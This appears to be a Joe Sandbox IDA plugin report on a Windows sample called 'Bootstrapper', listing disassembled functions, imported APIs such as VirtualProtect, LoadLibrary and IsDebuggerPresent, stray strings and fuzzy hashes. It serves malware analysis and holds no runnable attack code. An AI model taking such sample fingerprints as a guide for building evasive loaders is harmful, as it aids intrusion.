Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: fa9555f37e9bcad40d15a3753f67ec6437df51a323d621172d23e0a63ee3dbc2
Instruction ID: a50049ec98730a9ef2e6bb630192d70802613cd8f7cc1253326958e0d7f8d404
Opcode Fuzzy Hash: fa9555f37e9bcad40d15a3753f67ec6437df51a323d621172d23e0a63ee3dbc2
Instruction Fuzzy Hash: 0FD1F9B4A00208EFDB54DFA4C995FEEBBB5BF48300F208558E905AB346D675EE41DB60

Function 00799760 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 94
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00797620: EnterCriticalSection.KERNEL32(?,?,007858E0,00000000,D8E815C3), ref: 0079762F

VirtualProtect.KERNELBASE(0080B000,00000080,00000004,?), ref: 00799799
VirtualProtect.KERNELBASE(0080B000,00000080,00000002,?), ref: 00799865

Strings

cached_fp == new_fp, xrefs: 0079982F
%ls, xrefs: 007997E4, 00799834
minkernel\crts\ucrt\src\appcrt\internal\winapi_thunks.cpp, xrefs: 007997F0, 00799840
cached_fp == invalid_function_sentinel(), xrefs: 007997DF

Memory Dump Source

Source File: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd

Similarity

API ID: ProtectVirtual$CriticalEnterSection
String ID: %ls$cached_fp == invalid_function_sentinel()$cached_fp == new_fp$minkernel\crts\ucrt\src\appcrt\internal\winapi_thunks.cpp
API String ID: 2249083135-1239448957
Opcode ID: 2199cb5ecf52c229ab9a71f5cad3d6f061973f7d7c554b1d948b51d186d152ef
Instruction ID: 4c17b2b9967e55197484d47a379ae05d4be7e058fcb98b23d6bd12d0e0638df5
Opcode Fuzzy Hash: 2199cb5ecf52c229ab9a71f5cad3d6f061973f7d7c554b1d948b51d186d152ef
Instruction Fuzzy Hash: AE3160B1E40208FBEF10EFA4EC4AFAD7374AB45704F10445CF619A6182E6B86A54CB66

Function 007979D0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::_Timevec::_Timevec.LIBCPMTD ref: 007979F1

Strings

minkernel\crts\ucrt\src\appcrt\lowio\osfinfo.cpp, xrefs: 007979DA

Memory Dump Source

Source File: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd

Similarity

API ID: TimevecTimevec::_std::_
String ID: minkernel\crts\ucrt\src\appcrt\lowio\osfinfo.cpp
API String ID: 4219598475-534659383
Opcode ID: 0b017324642f79a9b826f8f6f6c333e39c7f359f72743f5b9516168ff1ec8950
Instruction ID: 735a4ca395a502e28d432a77f4c47048eebb9a7af9d4b5f728529b3a863f4709
Opcode Fuzzy Hash: 0b017324642f79a9b826f8f6f6c333e39c7f359f72743f5b9516168ff1ec8950
Instruction Fuzzy Hash: 5A4192B0A08248EFCB04DB98C591BEDBBB1AF54304F2482D8D0156B3C2D7749F06DB84

Function 007BDFD0 Relevance: 1.6, APIs: 1, Instructions: 111
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNELBASE(00000000,00000000,5FBFF111,00000000), ref: 007BE16B

Memory Dump Source

Source File: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 4145397a475e41d1b508e212315727e0f51c07c471cf77535c3cdeef071d81e1
Instruction ID: 0960f9aee720f2baf174564dd26ac3013634cd361716ad3a2abe67fe17e6f065
Opcode Fuzzy Hash: 4145397a475e41d1b508e212315727e0f51c07c471cf77535c3cdeef071d81e1
Instruction Fuzzy Hash: E441F924E2424CD6EB14DFE4D4407EEB772EF68700F20A429D109EB3A4E77A4A55C76A

Function 007BE450 Relevance: 1.6, APIs: 1, Instructions: 97
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 007BDFD0: LoadLibraryW.KERNELBASE(00000000,00000000,5FBFF111,00000000), ref: 007BE16B

LoadLibraryA.KERNELBASE(007BD9C7,00000000,00000001,5FBFF0FB,?,?,?,?,007BD9C7), ref: 007BE4AD

Memory Dump Source

Source File: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 81b1951c4f8b689c6a5172aab15668dca1c8adb7f196ad730add9b9f0a925985
Instruction ID: 804cca83c2bbf88fadd2486d9f2cb49190865e6c9dcedfbe5e684da14cdcf116
Opcode Fuzzy Hash: 81b1951c4f8b689c6a5172aab15668dca1c8adb7f196ad730add9b9f0a925985
Instruction Fuzzy Hash: 7341E770D00209EFCB14DFA8C884BEDBBB1FF48304F108169E915AB355D638AA51CF94

Function 00799E40 Relevance: 1.5, APIs: 1, Instructions: 19
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(0080B000,00000080,00000002,?), ref: 00799E58

Memory Dump Source

Source File: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: a6fffc76041d610344dfb09df06837e057ef2cb61222e92974c4398a7e865806
Instruction ID: 2849123cb3133ba58337ae356f1b8ddb66dd267a60099bb1979a94d42e7e1450
Opcode Fuzzy Hash: a6fffc76041d610344dfb09df06837e057ef2cb61222e92974c4398a7e865806
Instruction Fuzzy Hash: 85E02B2154C38C76FF10C6A45C0ABAE7F6C9741B01F0441D4EA84E61C1D6BB890EC3A2

Function 0077BCA0 Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___scrt_get_show_window_mode.LIBCMTD ref: 0077BCA6

Part of subcall function 0077C7B0: GetStartupInfoW.KERNEL32(?), ref: 0077C7CA

Memory Dump Source

Source File: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd

Similarity

API ID: InfoStartup___scrt_get_show_window_mode
String ID:
API String ID: 2456344720-0
Opcode ID: 8798566cf1ab6ff89ce6204bd82ff4acb9be21b634f7a22c2a423effe79c38d4
Instruction ID: de2e062093e40111a714856214fbc22508f404ce403d17e1efc09e5b0437a4a2
Opcode Fuzzy Hash: 8798566cf1ab6ff89ce6204bd82ff4acb9be21b634f7a22c2a423effe79c38d4
Instruction Fuzzy Hash: 82D05EB4D44208FBDB00FFE49807F6EB7B9AB88702F204199B50897282D9385A0097F1

Non-executed Functions

Function 00721000 Relevance: 41.6, APIs: 12, Strings: 9, Instructions: 4834COMMON

Download Yara Rule

Strings

]&zA, xrefs: 0072180F
0b|, xrefs: 00723F0C
v, xrefs: 00724B14
=gB\, xrefs: 00723536
B!, xrefs: 00721010
3q, xrefs: 0072234D
Z, xrefs: 00723DA3
rI?I, xrefs: 0072502E
qO', xrefs: 007238E7

Memory Dump Source

Source File: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd

Similarity

API ID:
String ID: 3q$=gB\$B!$Z$]&zA$rI?I$v$0b|$qO'
API String ID: 0-2389408367
Opcode ID: 434ecc566071a113fc7ccd4c207e06cd76f3f9eea43cdd7d54a1b4d4b9dcf337
Instruction ID: e7ee572e01e1ad521da27032eb082d91c65fe82ec68380d5248c988322ffc268
Opcode Fuzzy Hash: 434ecc566071a113fc7ccd4c207e06cd76f3f9eea43cdd7d54a1b4d4b9dcf337
Instruction Fuzzy Hash: FDB3CB75D002298FCB54CFA9D990AEDBBF1BF58310F14816AE858E7351E738AA81CF54

Function 007D01A0 Relevance: 40.8, APIs: 2, Strings: 20, Instructions: 2349COMMON

Download Yara Rule

Strings

V, xrefs: 007D202D
W, xrefs: 007D1F5C
T, xrefs: 007D1BE7
I, xrefs: 007D2031
W, xrefs: 007D1DF4
V, xrefs: 007D1BEF
I, xrefs: 007D1DFC
T, xrefs: 007D1F58
T, xrefs: 007D2025
W, xrefs: 007D2029
I, xrefs: 007D1F64
V, xrefs: 007D1DF8
V, xrefs: 007D1F60
I, xrefs: 007D1BF3
TWVI, xrefs: 007D1D3F
-L, xrefs: 007D1AF5
T, xrefs: 007D1DF0
W, xrefs: 007D1BEB
TWVI, xrefs: 007D1236
`, xrefs: 007D11AE

Memory Dump Source

Source File: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd

Similarity

API ID:
String ID: -L$I$I$I$I$T$T$T$T$TWVI$TWVI$V$V$V$V$W$W$W$W$`
API String ID: 0-1795987466
Opcode ID: 546def8708830e5c803441ad5b3ed412236819ffa1e1dc47075f999e150972fe
Instruction ID: 8d3b83e890296949f961a61ace3af812d38a870a6643e7e272f71e32829210da
Opcode Fuzzy Hash: 546def8708830e5c803441ad5b3ed412236819ffa1e1dc47075f999e150972fe
Instruction Fuzzy Hash: 1C230371908394CFCB10DF38C84579EBFF1AB56320F0986AED4999B392D7398945CB92

Function 00734470 Relevance: 36.1, APIs: 12, Strings: 7, Instructions: 2823COMMON

Download Yara Rule

Strings

aUns, xrefs: 00734771
~, xrefs: 00736E3C
cz7hN6, xrefs: 00735740
1', xrefs: 00736D0B
I, xrefs: 007367A4
", xrefs: 00735C8A
U ,, xrefs: 00734BE7

Memory Dump Source

Source File: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd

Similarity

API ID:
String ID: "$1'$I$U ,$aUns$cz7hN6$~
API String ID: 0-2497221563
Opcode ID: 3a3879b208d3ce5d0c7afbfcb242f166218ee1a4e1cb893226d5218fcdb75085
Instruction ID: 9c417b8dfdef4dabadc630c75868b97e6e56243df9ef4dfc3028b5bcc5581726
Opcode Fuzzy Hash: 3a3879b208d3ce5d0c7afbfcb242f166218ee1a4e1cb893226d5218fcdb75085
Instruction Fuzzy Hash: 4963ECB1D002699FCB54CFA9D990AECBBF1FB58310F14816AE858EB351E7389A41CF54

Function 0073C5A0 Relevance: 25.3, APIs: 8, Strings: 6, Instructions: 847COMMON

Download Yara Rule

Strings

>3hq, xrefs: 0073CEED
$Ybz, xrefs: 0073C725
3, xrefs: 0073C665
q, xrefs: 0073CC2B
=K, xrefs: 0073C709
9Xw5, xrefs: 0073CC4B

Memory Dump Source

Source File: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd

Similarity

API ID:
String ID: $Ybz$3$9Xw5$=K$>3hq$q
API String ID: 0-913196644
Opcode ID: 037c5d6e173e0ecd79cb4df63c71e6c90630e2e9d9c7d1695f176afae44a2aec
Instruction ID: 2c4ecc90825877a9146a2ab597d743c1faa54b8794fe3cbbb8884c5dae15b629
Opcode Fuzzy Hash: 037c5d6e173e0ecd79cb4df63c71e6c90630e2e9d9c7d1695f176afae44a2aec
Instruction Fuzzy Hash: 5D728A71E00219CFCB18CFA9E8916EDBBF1FB58310B14826AD859E7354EB385945CF54

Function 007255A0 Relevance: 20.8, APIs: 4, Strings: 5, Instructions: 5081COMMON

Download Yara Rule

Strings

$(5, xrefs: 00727A42
<8, xrefs: 007287AC
d, xrefs: 00726BCC
[_jM, xrefs: 007271F5
}r", xrefs: 00727DE8

Memory Dump Source

Source File: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd

Similarity

API ID:
String ID: <8$[_jM$d$$(5$}r"
API String ID: 0-1869771855
Opcode ID: 156a7cffc2feea6dd1b86a6c57cc424029839bcb838a5144d879873404a74078
Instruction ID: d2775d630fe5b2582f50589a5c59e49b1a1954a74d476a3cb0dcff5012100793
Opcode Fuzzy Hash: 156a7cffc2feea6dd1b86a6c57cc424029839bcb838a5144d879873404a74078
Instruction Fuzzy Hash: 7BB3BC75D002298FCB54CFA9E991AEDBBF1BF58310F14816AE858E7350E7389A81CF54

Function 00737010 Relevance: 19.1, APIs: 3, Strings: 7, Instructions: 1582COMMON

Download Yara Rule

Strings

a, xrefs: 00737F3B
fJ, xrefs: 007373CD
zL;i, xrefs: 00737FE5
d, xrefs: 00737300
$, xrefs: 00737123
*, xrefs: 007379B3
ay55, xrefs: 007379C4

Memory Dump Source

Source File: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd

Similarity

API ID:
String ID: $$*$a$ay55$d$fJ$zL;i
API String ID: 0-2827015963
Opcode ID: 3a635ac3806847217396fbfb9b74460444bccb6d3ca9d683f3504bb2ecbc7326
Instruction ID: 6fc6b15ea7c9f9099369c4f7fe9090b270e6f615b40ecc396b8a32cb85b6d6b5
Opcode Fuzzy Hash: 3a635ac3806847217396fbfb9b74460444bccb6d3ca9d683f3504bb2ecbc7326
Instruction Fuzzy Hash: 64F22275D002599FCB54CFA9D891AECBBF0FB58310F14812AE898EB391E7389945CF54

Function 007A24D0 Relevance: 12.9, APIs: 4, Strings: 3, Instructions: 604COMMON

Download Yara Rule

Strings

("Division by zero", false), xrefs: 007A2504
%ls, xrefs: 007A2509
minkernel\crts\ucrt\inc\corecrt_internal_big_integer.h, xrefs: 007A2515

Memory Dump Source

Source File: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd

Similarity

API ID:
String ID: %ls$("Division by zero", false)$minkernel\crts\ucrt\inc\corecrt_internal_big_integer.h
API String ID: 0-226933
Opcode ID: 7a30850e04aae55803051b10247fde17c48833b5ebdb763e1017c743cd4ce746
Instruction ID: 02c889d9194f74f7c7fe0709913cb612b793d5bfb18ee9d8f5708b2822e5930e
Opcode Fuzzy Hash: 7a30850e04aae55803051b10247fde17c48833b5ebdb763e1017c743cd4ce746
Instruction Fuzzy Hash: EC629974A049289FDB64CF18CD94BAAB7B2BF89316F1082D9D84DA7345DB346E81CF40

Function 00738630 Relevance: 8.1, Strings: 4, Instructions: 3140COMMON

Download Yara Rule

Strings

n,"E, xrefs: 00739FC8
~z8, xrefs: 00738DDC
U, xrefs: 007399B1
>, xrefs: 007391FD

Memory Dump Source

Source File: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd

Similarity

API ID:
String ID: >$n,"E$~z8$U
API String ID: 0-600631289
Opcode ID: 5a4248619b9aa9bfddad46f8397a3425c0a4beb78fc6b0247ff64486c3835fc4
Instruction ID: 5504e394315594c843ffa1c885ec8fa926c15ba84608c36b82be110136623767
Opcode Fuzzy Hash: 5a4248619b9aa9bfddad46f8397a3425c0a4beb78fc6b0247ff64486c3835fc4
Instruction Fuzzy Hash: 4C63F075D002298FCB54CFA9E990AECBBF1FB58311F14826AE858E7351E738A941CF54

Function 0073B300 Relevance: 6.2, Strings: 4, Instructions: 1210COMMON

Download Yara Rule

Strings

N, xrefs: 0073BC61
O, xrefs: 0073BC00
@, xrefs: 0073C1ED
;, xrefs: 0073B464

Memory Dump Source

Source File: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd

Similarity

API ID:
String ID: @$N$O$;
API String ID: 0-3489239494
Opcode ID: 2cd1a18a9d19744a0948724d4435652df9e4fcb6b01669fb05e4281edfd1d61e
Instruction ID: c1073304162ad482e64cd411a82972f9db2ccd19eaf0950ce2625543301afb8c
Opcode Fuzzy Hash: 2cd1a18a9d19744a0948724d4435652df9e4fcb6b01669fb05e4281edfd1d61e
Instruction Fuzzy Hash: 0CC22475D002698FCB18CFA9D8906ECBBF1FB58310F14826AE489EB395E7385945CF54

Function 0077C670 Relevance: 6.1, APIs: 4, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0077C67B
IsDebuggerPresent.KERNEL32 ref: 0077C74B
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0077C777
UnhandledExceptionFilter.KERNEL32(?), ref: 0077C781

Memory Dump Source

Source File: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: ebb915f776cfd66cba3e44dd315484be5f84fcd946d8ddb2c78479c877eccfdc
Instruction ID: adc62a97fa48509b17e07dfbddfd1001c3c219ae82e2a7d53bdaca445bd70997
Opcode Fuzzy Hash: ebb915f776cfd66cba3e44dd315484be5f84fcd946d8ddb2c78479c877eccfdc
Instruction Fuzzy Hash: 433114B8D05328DADF21DF60D9497DDBBB4AF58304F0081E9E80D6A241EBB95A89CF45

Function 00795070 Relevance: 4.7, APIs: 3, Instructions: 238filetimeCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(00000000,?,D8E815C3), ref: 0079519B
std::_Timevec::_Timevec.LIBCPMTD ref: 007951A8
FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 0079533D

Memory Dump Source

Source File: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd

Similarity

API ID: FileFind$FirstNextTimevecTimevec::_std::_
String ID:
API String ID: 2141543823-0
Opcode ID: 03ad175f418ae0cf9b98c561aef7ee58284cd1455a99416b719d911df03fe7c2
Instruction ID: 58ead476765fbdc3295937b142d3803a65db0b0e327caf8040ba575f8c603c69
Opcode Fuzzy Hash: 03ad175f418ae0cf9b98c561aef7ee58284cd1455a99416b719d911df03fe7c2
Instruction Fuzzy Hash: 0BA10A71904528DBDF65EF24DC99BEEB376AB44300F5042E9E40E67291EB386E85CF50

Function 0073D180 Relevance: 3.1, Strings: 1, Instructions: 1898COMMON

Download Yara Rule

Strings

4, xrefs: 0073E110

Memory Dump Source

Source File: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd

Similarity

API ID:
String ID: 4
API String ID: 0-4088798008
